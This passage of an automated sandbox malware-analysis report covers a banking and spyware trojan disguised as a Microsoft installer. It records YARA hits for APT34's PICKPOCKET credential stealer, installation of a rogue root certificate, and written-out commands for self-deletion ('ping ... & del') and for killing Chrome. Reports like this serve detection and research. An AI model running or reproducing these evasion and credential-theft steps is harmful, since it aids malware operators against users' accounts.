Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040AE4D OpenClipboard,9_2_0040AE4D

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F780

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 2.2.83C12B0D0FA88B10.exe.3200000.7.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.83C12B0D0FA88B10.exe.3300000.8.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: IpB8f8qwze.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 83C12B0D0FA88B10.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001A000 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_1001A000
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019DA0 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,0_2_10019DA0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019F60 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019F60
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10019FB0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019FB0
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040C516 NtQuerySystemInformation,9_2_0040C516
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,9_2_0040C6FB
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001D840: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle,0_2_1001D840
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004100950_2_00410095
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004050BA0_2_004050BA
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0041D0BC0_2_0041D0BC
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042D94A0_2_0042D94A
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042893F0_2_0042893F
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004229CE0_2_004229CE
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0041B2FA0_2_0041B2FA
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00426B860_2_00426B86
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00426B8B0_2_00426B8B
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00426C1D0_2_00426C1D
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042875C0_2_0042875C
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004297650_2_00429765
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004287210_2_00428721
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000C0730_2_1000C073
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000B8930_2_1000B893
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100061000_2_10006100
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100099F00_2_100099F0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100072000_2_10007200
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10016A1D0_2_10016A1D
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100092670_2_10009267
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10010AAC0_2_10010AAC
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100083500_2_10008350
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000ABB00_2_1000ABB0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000B3C00_2_1000B3C0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000E3E00_2_1000E3E0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100084000_2_10008400
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001EC300_2_1001EC30
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000BC670_2_1000BC67
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000C4930_2_1000C493
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100105F00_2_100105F0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001EE3B0_2_1001EE3B
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1000FFD10_2_1000FFD1
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 1_2_07A8E3E61_2_07A8E3E6
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 1_2_07A8E3FB1_2_07A8E3FB
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000C0732_2_1000C073
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000B8932_2_1000B893
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100061002_2_10006100
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100099F02_2_100099F0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100072002_2_10007200
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10016A1D2_2_10016A1D
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100092672_2_10009267
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10010AAC2_2_10010AAC
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100083502_2_10008350
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000ABB02_2_1000ABB0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000B3C02_2_1000B3C0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000E3E02_2_1000E3E0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100084002_2_10008400
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1001EC302_2_1001EC30
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000BC672_2_1000BC67
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000C4932_2_1000C493
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100105F02_2_100105F0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1001EE3B2_2_1001EE3B
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1000FFD12_2_1000FFD1
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_00404BE49_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_0114B51C23_2_0114B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_01149B7F23_2_01149B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_0114A7BB23_2_0114A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_01146A1E23_2_01146A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_0114963B23_2_0114963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_0114A0C323_2_0114A0C3
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: String function: 00433CEA appears 53 times
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: String function: 00435B5E appears 72 times
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: String function: 004300D9 appears 450 times
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: String function: 00430A57 appears 633 times
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: String function: 10010594 appears 35 times
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: String function: 00430F28 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: String function: 10010594 appears 35 times
Source: IpB8f8qwze.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 83C12B0D0FA88B10.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1615173766196.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1615173766196.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IpB8f8qwze.exe, 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmpBinary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.P&OriginalFilenameSSMS-Setup-ENU.exe vs IpB8f8qwze.exe
Source: IpB8f8qwze.exe, 00000000.00000002.258243387.0000000000B00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs IpB8f8qwze.exe
Source: IpB8f8qwze.exe, 00000000.00000002.258239090.0000000000AF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs IpB8f8qwze.exe
Source: IpB8f8qwze.exe, 00000000.00000002.258255558.0000000000B20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs IpB8f8qwze.exe
Source: IpB8f8qwze.exeBinary or memory string: tLegalCopyrightCopyright (c) Microsoft Corporation. All rights reserved.P&OriginalFilenameSSMS-Setup-ENU.exe vs IpB8f8qwze.exe
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: IpB8f8qwze.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000002.00000002.310468368.0000000002720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.258774447.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.275254387.0000000002650000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.2650000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.IpB8f8qwze.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.83C12B0D0FA88B10.exe.2720000.3.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.IpB8f8qwze.exe.27b0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.2650000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.83C12B0D0FA88B10.exe.2720000.3.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.IpB8f8qwze.exe.27b0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.10000000.12.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.83C12B0D0FA88B10.exe.3200000.7.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 2.2.83C12B0D0FA88B10.exe.10000000.12.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.83C12B0D0FA88B10.exe.3300000.8.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal90.bank.troj.spyw.evad.winEXE@32/37@33/4
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00433DA8 FormatMessageW,GetLastError,LocalFree,0_2_00433DA8
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004011BF GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,GetLastError,CloseHandle,0_2_004011BF
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,9_2_0040CE93
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004358BF GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_004358BF
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,9_2_0040D9FC
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0041DA76 ChangeServiceConfigW,GetLastError,0_2_0041DA76
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Login Data1615173735593Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1004:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\IpB8f8qwze.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeJump to behavior
Source: IpB8f8qwze.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1615173766196.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: IpB8f8qwze.exeVirustotal: Detection: 46%
Source: IpB8f8qwze.exeMetadefender: Detection: 16%
Source: IpB8f8qwze.exeReversingLabs: Detection: 37%
Source: IpB8f8qwze.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: IpB8f8qwze.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: IpB8f8qwze.exeString found in binary or memory: Cburn.runonceWixBundleLayoutDirectoryFailed to initialize engine state.Failed to initialize COM.Failed to initialize Regutil.Failed to initialize Wiutil.Failed to initialize XML util.engine.cppFailed to get OS info.3.8.1128.0Failed to initialize core.Failed to run per-user mode.Failed to run per-machine mode.Failed to run embedded mode.Failed to run RunOnce mode.Invalid run mode.txt_FailedSetupFailed to initialize engine section.Failed to open log.Failed to initialize internal cache functionality.Failed to create pipes to connect to elevated parent process.Failed to connect to elevated parent process.Failed to check global conditionsFailed to create the message window.Failed to query registration.Failed to set action variables.Failed to set registration variables.Failed to set layout directory variable to value provided from command-line.Failed while running Failed to create implicit elevated connection name and secret.Failed to launch unelevated process.Failed to connect to unelevated process.Failed to allocate thread local storage for logging.Failed to set elevated pipe into thread local storage for logging.Failed to pump messages from parent process.Failed to connect to parent of embedded process.Failed to run bootstrapper application embedded.Failed to get command line.Failed to get current process path.Failed to re-launch bundle process after RunOnce: %lsFailed to create engine for UX.Failed to load UX.Failed to start bootstrapper application.Unexpected return value from message pump.Failed to get process token.SeShutdownPrivilegeFailed to get shutdown privilege LUID.Failed to adjust token to add shutdown privileges.Failed to schedule restart.
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile read: C:\Users\user\Desktop\IpB8f8qwze.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\IpB8f8qwze.exe 'C:\Users\user\Desktop\IpB8f8qwze.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0E9F5C63C593DB0A234ED10779F63A5A C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1615173766196.exe 'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'Jump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01Jump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01Jump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Users\user\AppData\Roaming\1615173766196.exe 'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt'Jump to behavior
